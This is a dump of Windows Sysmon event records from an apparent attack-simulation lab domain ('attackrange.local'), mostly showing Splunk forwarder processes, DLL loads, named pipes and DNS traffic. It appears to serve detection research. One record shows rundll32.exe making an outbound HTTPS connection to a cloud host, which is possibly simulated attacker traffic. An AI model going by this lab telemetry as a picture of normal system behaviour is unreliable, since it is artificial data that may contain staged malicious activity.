10341000x800000000000000057343990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057343989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057343988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.784{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057343987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:07.783{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057343986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:07.783{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057343985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:07.783{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057343984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:07.783{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057343983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:07.783{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057343982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:07.783{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000057343981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.766{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\surveyor-20211011185454-44545MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7falsetrue 354300x800000000000000057343980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:38.431{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-469.attackrange.local61183-false10.0.0.2ip-10-0-0-2.us-west-2.compute.internal53domain 354300x800000000000000057343979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:38.431{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local64786- 354300x800000000000000057343978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:38.431{8B6011A9-886D-6164-1400-00000000F101}1068C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local64786-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domain 11241100x800000000000000057343977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.080{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.080{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB6AAC2FD73A9FB209DD6E30EE79EB0C,SHA256=C6DCECF16BA56DBF747C855AE6DFE83E730ED83EC68F9F336588264E4AA36903falsetrue 10341000x800000000000000021219235Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.919{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5ACC-618E-FCCD-08000000F101}4216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219234Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.919{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219233Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.919{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219232Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.919{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219231Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.919{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219230Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.919{AD5E2759-5432-6143-0500-00000000F101}412980C:\Windows\system32\csrss.exe{AD5E2759-5ACC-618E-FCCD-08000000F101}4216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219229Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.919{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5ACC-618E-FCCD-08000000F101}4216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219228Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.905{AD5E2759-5ACC-618E-FCCD-08000000F101}4216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021219227Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.528{AD5E2759-5ACC-618E-FBCD-08000000F101}13205676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219226Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.388{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4413E184BB346463FDF307B882106429,SHA256=8F49AA57778FBEA8BCC7AB3E825F79A173EBF3A0759A6EDCAEC9E3D46937C42B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000057344102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.694{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057344101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.694{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057344100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.694{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.694{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 354300x800000000000000057344098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:38.443{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54505-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x800000000000000057344097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.547{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.547{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F00857DC66F18F7E85E57C660BFD7626,SHA256=A125848DB22CB9A5CCE27C886DB364F2E8D4764B069A04DDDB73E0CCAB4D3988falsetrue 734700x800000000000000057344095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.463{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.463{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.463{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:08.463{8B6011A9-5ACC-618E-32F3-04000000F101}8008\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057344091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.463{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:08.463{8B6011A9-5ACC-618E-32F3-04000000F101}8008\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057344089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.463{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.447{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.447{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x800000000000000057344079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 